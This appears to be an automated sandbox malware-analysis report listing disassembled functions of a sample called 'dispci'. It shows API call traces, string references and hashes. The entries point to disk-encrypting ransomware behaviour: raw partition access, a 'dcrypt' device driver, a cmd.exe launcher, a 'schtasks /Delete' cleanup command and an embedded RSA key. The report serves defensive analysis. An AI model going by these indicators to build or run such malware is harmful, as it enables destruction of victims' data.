                                                                      • LocalFree.KERNEL32(00000000), ref: 00DF156A
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Local_memmove$AllocFree$DefaultInfoInformationSystemTimeWkstaZone
                                                                      • String ID:
                                                                      • API String ID: 605661058-0
                                                                      • Opcode ID: ef79cfc930e34d7b95084db8be5e237234addf783ab125f41967e043e88b4765
                                                                      • Instruction ID: 8b92bf815125ba79c3e6f1de4790144e3a8663224d0f363388a6b73e536fa400
                                                                      • Opcode Fuzzy Hash: ef79cfc930e34d7b95084db8be5e237234addf783ab125f41967e043e88b4765
                                                                      • Instruction Fuzzy Hash: BC71B275A00219DBDB20DF68DC84BAAB7B5EF44310F09C299EA0997251DB30DE84CBA1
                                                                      Function 00DF35D0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 195fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00DF35FA
                                                                      • CreateFileW.KERNEL32(\\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1),80100000,00000003,00000000,00000003,00000000,00000000,?,?,00DF2DD3), ref: 00DF3616
                                                                      • DeviceIoControl.KERNEL32(00000000,00070048,00000000,00000000,?,00000090,?,00000000), ref: 00DF3666
                                                                      • DeviceIoControl.KERNEL32(00000000,002D1080,00000000,00000000,?,0000000C,?,00000000), ref: 00DF36A3
                                                                      • CloseHandle.KERNEL32(00000000,?,?,00DF2DD3), ref: 00DF3802
                                                                      Strings
                                                                      • \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1), xrefs: 00DF3611
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: ControlDevice$CloseCreateFileHandle_memset
                                                                      • String ID: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
                                                                      • API String ID: 2416907234-457416688
                                                                      • Opcode ID: b0563792646fe73b11008aab6a72648123e19a51af73e577f9d581e7729c2396
                                                                      • Instruction ID: f8c22acd097b8ef1634584f58c1f189ecc154303fec05a362edb4c8ee1c39236
                                                                      • Opcode Fuzzy Hash: b0563792646fe73b11008aab6a72648123e19a51af73e577f9d581e7729c2396
                                                                      • Instruction Fuzzy Hash: 39618775A40314ABE730DF54DC41BAAB7F8EF48750F118559E689E72C0D7B0AE848BA4
                                                                      Function 00DF3820 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(?,00000001,?,?,?,?,00DF2463,?), ref: 00DF382D
                                                                      • CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,00DF2463,?), ref: 00DF3845
                                                                      • TlsSetValue.KERNEL32(?,00000000,?,?,?,?,00DF2463,?), ref: 00DF385A
                                                                      • DeviceIoControl.KERNEL32(00000000,00220064,?,00000004,00000000,00000000,?,00000000), ref: 00DF3876
                                                                      • GetLastError.KERNEL32(?,?,?,?,00DF2463,?), ref: 00DF3880
                                                                      • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,00DF2463,?), ref: 00DF3894
                                                                      • VirtualUnlock.KERNEL32(?,?,?,?,?,?,00DF2463,?), ref: 00DF38C2
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00DF2463,?), ref: 00DF38D3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Value$ControlCreateDeviceErrorFileFreeLastQueryUnlock
                                                                      • String ID: \\.\dcrypt
                                                                      • API String ID: 78819294-1945893055
                                                                      • Opcode ID: b5885f972e987c2b1a3da61d0a5dfc4a69dfc9a51571ed71467ebfa8a85f8575
                                                                      • Instruction ID: f68f9ef7bb673ada1f43dd2ff50bf51d5fbb1484effc632cfbe494d87a712aa9
                                                                      • Opcode Fuzzy Hash: b5885f972e987c2b1a3da61d0a5dfc4a69dfc9a51571ed71467ebfa8a85f8575
                                                                      • Instruction Fuzzy Hash: 1C216271A41219BFEB209BA9DC49FBA376CEB08791F068105FA05F6190D7759E488BB0
                                                                      Function 00DF1F30 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75memorysynchronizationthreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLogicalDrives.KERNEL32 ref: 00DF1F43
                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00DF1F88
                                                                      • LocalAlloc.KERNEL32(00000040,00000050), ref: 00DF1F97
                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00001E40,00000000,00000000,00000000), ref: 00DF1FDC
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00DF1FE7
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00DF1FEE
                                                                      Strings
                                                                      • MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxX, xrefs: 00DF1FB0
                                                                      • :, xrefs: 00DF1F7D
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: AllocCloseCreateDriveDrivesHandleLocalLogicalObjectSingleThreadTypeWait
                                                                      • String ID: :$MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxX
                                                                      • API String ID: 3841114299-3934174110
                                                                      • Opcode ID: 70944d357acaabba2ef15436c96956f88345571ec6c2ad603d0da6692d9b219f
                                                                      • Instruction ID: 3a6dd46a3d3612e4632c569b90827a67b1a5b965800daac53a6631494a65985f
                                                                      • Opcode Fuzzy Hash: 70944d357acaabba2ef15436c96956f88345571ec6c2ad603d0da6692d9b219f
                                                                      • Instruction Fuzzy Hash: CC21AC75A01209EFDB00DF65CC44BAEBBB4FF49310F058169EA15BB390CB719A08CBA0
                                                                      Function 00DF4490 Relevance: 13.6, APIs: 9, Instructions: 80memoryfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44AA
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44BD
                                                                      • GetProcessHeap.KERNEL32(00000000,00000001,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44D0
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44D7
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44F3
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF4504
                                                                      • HeapFree.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF450B
                                                                      • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF4513
                                                                      • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF4535
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$File$CloseHandleProcess$AllocCreateFreeReadSize
                                                                      • String ID:
                                                                      • API String ID: 2825476172-0
                                                                      • Opcode ID: f63e1a195c795f3d78ee5473898ecdb1b19735ac4d34fb7cbad098955eff378a
                                                                      • Instruction ID: 67df3479a26ffd82a66c8ed4d35b51ad34dbfc4ed20bdeaae12ec585155fa2b8
                                                                      • Opcode Fuzzy Hash: f63e1a195c795f3d78ee5473898ecdb1b19735ac4d34fb7cbad098955eff378a
                                                                      • Instruction Fuzzy Hash: C1216675601214BFC7209BBAEC4CFAFBF7CEB49762F144146FA09E3250D6728A44C6A0
                                                                      Function 00DF20A0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(?), ref: 00DF20BD
                                                                      • _wcschr.LIBCMT ref: 00DF20C8
                                                                      • _wcschr.LIBCMT ref: 00DF20F8
                                                                      • __snwprintf.LIBCMT ref: 00DF210C
                                                                      • DeviceIoControl.KERNEL32(00000000,00220040,?,00000298,?,00000298,?,00000000), ref: 00DF213D
                                                                      • DeviceIoControl.KERNEL32(00000000,0022001C,?,00000298,?,0000022C,?,00000000), ref: 00DF2196
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: ControlDevice_wcschr$Value__snwprintf
                                                                      • String ID: \??\Volume%s
                                                                      • API String ID: 2726058786-4071929160
                                                                      • Opcode ID: b4908c17801f6de36a9f92562e7220a34ae02d96730b492aeabbaeeaacbb1766
                                                                      • Instruction ID: cd8dd47ef51fede139e374a38800a3c869fcf84f80f8c9f49fcd77c437933f35
                                                                      • Opcode Fuzzy Hash: b4908c17801f6de36a9f92562e7220a34ae02d96730b492aeabbaeeaacbb1766
                                                                      • Instruction Fuzzy Hash: D331D331A00308AEDB20DB64DC46FBAB378EF49710F458159F60A97195EEB49E84CBB5
                                                                      Function 00DF3BE0 Relevance: 12.1, APIs: 8, Instructions: 126fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __aullrem.LIBCMT ref: 00DF3BFA
                                                                      • _malloc.LIBCMT ref: 00DF3C40
                                                                      • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 00DF3C63
                                                                      • ReadFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,00000000,00000000), ref: 00DF3C88
                                                                      • _memmove.LIBCMT ref: 00DF3CA6
                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000), ref: 00DF3CBB
                                                                      • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00000000,?,00000000,00000000), ref: 00DF3CD7
                                                                      • _free.LIBCMT ref: 00DF3CEF
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: File$Pointer$ReadWrite__aullrem_free_malloc_memmove
                                                                      • String ID:
                                                                      • API String ID: 2931023824-0
                                                                      • Opcode ID: 666caf86ab6795251c5ee3d76c1ece564036c5aaffb5a70b7be19d50e1fab9a3
                                                                      • Instruction ID: 886ef606197c5880b4a4a248ea9d1c2551d1a695f369cea81de65c84782edeb4
                                                                      • Opcode Fuzzy Hash: 666caf86ab6795251c5ee3d76c1ece564036c5aaffb5a70b7be19d50e1fab9a3
                                                                      • Instruction Fuzzy Hash: 7F417076A00219ABCB10CF65CC85EAA7B69EB85750F168219FE09AB244D630EA44C7F1
                                                                      Function 00DF2E50 Relevance: 9.1, APIs: 6, Instructions: 137fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __aullrem.LIBCMT ref: 00DF2E65
                                                                      • _malloc.LIBCMT ref: 00DF2EB6
                                                                      • SetFilePointer.KERNEL32(?,00000000,?,00000000), ref: 00DF2EDE
                                                                      • ReadFile.KERNEL32(?,00000000,-00000200,?,00000000,?,00000000,?,00000000), ref: 00DF2F01
                                                                      • _memmove.LIBCMT ref: 00DF2F29
                                                                      • _free.LIBCMT ref: 00DF2F35
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: File$PointerRead__aullrem_free_malloc_memmove
                                                                      • String ID:
                                                                      • API String ID: 2967271196-0
                                                                      • Opcode ID: 37356f3e9132765c2b211aa8c9d23ee30dda9f79eb02aae53676949d3d37f84c
                                                                      • Instruction ID: 547767384e391844d4f8ee291b12e3e14f7cef1e6f2850174c70b80d81ad63a7
                                                                      • Opcode Fuzzy Hash: 37356f3e9132765c2b211aa8c9d23ee30dda9f79eb02aae53676949d3d37f84c
                                                                      • Instruction Fuzzy Hash: 7A418371E1011CAFDB14CF59D884ABAB7B9EF84320F19C16AFD199B791E6349E4087A0
                                                                      Function 00DF3AF0 Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __aullrem.LIBCMT ref: 00DF3B0A
                                                                      • _malloc.LIBCMT ref: 00DF3B50
                                                                      • SetFilePointer.KERNEL32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DF3B73
                                                                      • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,00000000,00000000,00000000,?,00000000), ref: 00DF3B93
                                                                      • _memmove.LIBCMT ref: 00DF3BBC
                                                                      • _free.LIBCMT ref: 00DF3BC5
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: File$PointerRead__aullrem_free_malloc_memmove
                                                                      • String ID:
                                                                      • API String ID: 2967271196-0
                                                                      • Opcode ID: 90e5320d93a62b27c918aff5e344703ccdb13fe34b207076662c9fb7200ea8e5
                                                                      • Instruction ID: cf20fee242445a90a2ba261ceec78cca301a78b411f21e6e6153112c036eaa7c
                                                                      • Opcode Fuzzy Hash: 90e5320d93a62b27c918aff5e344703ccdb13fe34b207076662c9fb7200ea8e5
                                                                      • Instruction Fuzzy Hash: 2E31B7B6A00219ABCB10DF69DC809AA77B9EF94310F16C269FE159B340D630EE04C7F0
                                                                      Function 00DF970C Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 00DF9718
                                                                        • Part of subcall function 00DFA0B6: __getptd_noexit.LIBCMT ref: 00DFA0B9
                                                                        • Part of subcall function 00DFA0B6: __amsg_exit.LIBCMT ref: 00DFA0C6
                                                                      • __amsg_exit.LIBCMT ref: 00DF9738
                                                                      • __lock.LIBCMT ref: 00DF9748
                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00DF9765
                                                                      • _free.LIBCMT ref: 00DF9778
                                                                      • InterlockedIncrement.KERNEL32(014517F0), ref: 00DF9790
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                      • String ID:
                                                                      • API String ID: 3470314060-0
                                                                      • Opcode ID: 92166f1290194b64cf0f1d8630035f717945f573298a88e5f1129fa6a626bb6b
                                                                      • Instruction ID: 30fee6c81a9e851add53e0fea4a6ec793734d2b49fb17eb313d76283fee46890
                                                                      • Opcode Fuzzy Hash: 92166f1290194b64cf0f1d8630035f717945f573298a88e5f1129fa6a626bb6b
                                                                      • Instruction Fuzzy Hash: A501C031D15B199BC711BF6AA94677EF360AF04720F1AC006FA44B7291CB745A85CBF2
                                                                      Function 00DF5A50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00DF5910: GetLocalTime.KERNEL32(?), ref: 00DF592B
                                                                        • Part of subcall function 00DF5910: SystemTimeToFileTime.KERNEL32(?,?), ref: 00DF593F
                                                                        • Part of subcall function 00DF5910: FileTimeToSystemTime.KERNEL32(?,?), ref: 00DF5979
                                                                        • Part of subcall function 00DF5910: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF598B
                                                                        • Part of subcall function 00DF5910: PathAppendW.SHLWAPI(?,?), ref: 00DF59F8
                                                                        • Part of subcall function 00DF57B0: _vswprintf_s.LIBCMT ref: 00DF57DB
                                                                        • Part of subcall function 00DF5810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00DF585A
                                                                        • Part of subcall function 00DF5810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF5870
                                                                        • Part of subcall function 00DF5810: lstrcatW.KERNEL32(?,\cmd.exe,?,?), ref: 00DF5886
                                                                        • Part of subcall function 00DF5810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00DF58EE
                                                                      • WaitForSingleObject.KERNEL32(?,00007530), ref: 00DF5ACE
                                                                      • WaitForSingleObject.KERNEL32(?,00007530), ref: 00DF5B2C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Time$System$DirectoryFileObjectSingleWait$AppendCreateEnvironmentLocalPathProcessVariable_vswprintf_slstrcat
                                                                      • String ID: %ws_%u$schtasks /Delete /F /TN %ws$viserion
                                                                      • API String ID: 1242734776-1187404337
                                                                      • Opcode ID: ab1df73ed8cb2ab047fc9f59e77ea2434581365db9684458ef7743e5a29543a2
                                                                      • Instruction ID: 00f5aa45b72f117602b550cf46b092976c95cb21243054ac3818e401c78fbc06
                                                                      • Opcode Fuzzy Hash: ab1df73ed8cb2ab047fc9f59e77ea2434581365db9684458ef7743e5a29543a2
                                                                      • Instruction Fuzzy Hash: 4721A5A1750B086BD210B620AC87EBB7B55DB80754F418438B748672D5E975BD4C8AF1
                                                                      Function 00DF3350 Relevance: 7.6, APIs: 5, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00DF39E0: __snwprintf.LIBCMT ref: 00DF3A0A
                                                                        • Part of subcall function 00DF39E0: _malloc.LIBCMT ref: 00DF3A11
                                                                        • Part of subcall function 00DF39E0: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00DF3A39
                                                                        • Part of subcall function 00DF39E0: _free.LIBCMT ref: 00DF3AD6
                                                                      • _malloc.LIBCMT ref: 00DF33C1
                                                                      • CloseHandle.KERNEL32 ref: 00DF350F
                                                                      • _free.LIBCMT ref: 00DF3516
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: _free_malloc$CloseCreateFileHandle__snwprintf
                                                                      • String ID:
                                                                      • API String ID: 496446412-0
                                                                      • Opcode ID: c5340970e5c30d84efbc9a6455093bd934b89ff8c6e96c10969c9ee13f07320a
                                                                      • Instruction ID: 925f0697c47779524f78b330ec7d475429ae08971f8d1548ada39f28ae91cd3d
                                                                      • Opcode Fuzzy Hash: c5340970e5c30d84efbc9a6455093bd934b89ff8c6e96c10969c9ee13f07320a
                                                                      • Instruction Fuzzy Hash: 854181B2D0021C5BDB21DA548C81BFA7378EB84310F1BC1B9EB0967241D675AF858BF5
                                                                      Function 00DF2650 Relevance: 7.6, APIs: 5, Instructions: 136COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00DF39E0: __snwprintf.LIBCMT ref: 00DF3A0A
                                                                        • Part of subcall function 00DF39E0: _malloc.LIBCMT ref: 00DF3A11
                                                                        • Part of subcall function 00DF39E0: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00DF3A39
                                                                        • Part of subcall function 00DF39E0: _free.LIBCMT ref: 00DF3AD6
                                                                      • DeviceIoControl.KERNEL32(?,000700A0,00000000,00000000,?,00000028,?,00000000), ref: 00DF269B
                                                                      • __aulldiv.LIBCMT ref: 00DF26E5
                                                                      • __aulldiv.LIBCMT ref: 00DF2702
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000,?,00000000,?,000700A0,00000000), ref: 00DF27D2
                                                                      • _free.LIBCMT ref: 00DF27D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldiv_free$CloseControlCreateDeviceFileHandle__snwprintf_malloc
                                                                      • String ID:
                                                                      • API String ID: 1280953716-0
                                                                      • Opcode ID: e26c9259746c38489aebb399acb16da17f4b2dad1254a43dcc97a9e5e038a7d1
                                                                      • Instruction ID: d996f35e010c2fee0ffdeb2d8ffea104814ce6b38223217b0214b5d9855c7fd2
                                                                      • Opcode Fuzzy Hash: e26c9259746c38489aebb399acb16da17f4b2dad1254a43dcc97a9e5e038a7d1
                                                                      • Instruction Fuzzy Hash: 3E4146B5D011185FDB24DB25CC89BBBB3B9EB84710F1581D5B909A7240D774AE80CF70
                                                                      Function 00DF5370 Relevance: 7.6, APIs: 5, Instructions: 122memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000040), ref: 00DF539B
                                                                        • Part of subcall function 00DF2020: TlsGetValue.KERNEL32(?), ref: 00DF202B
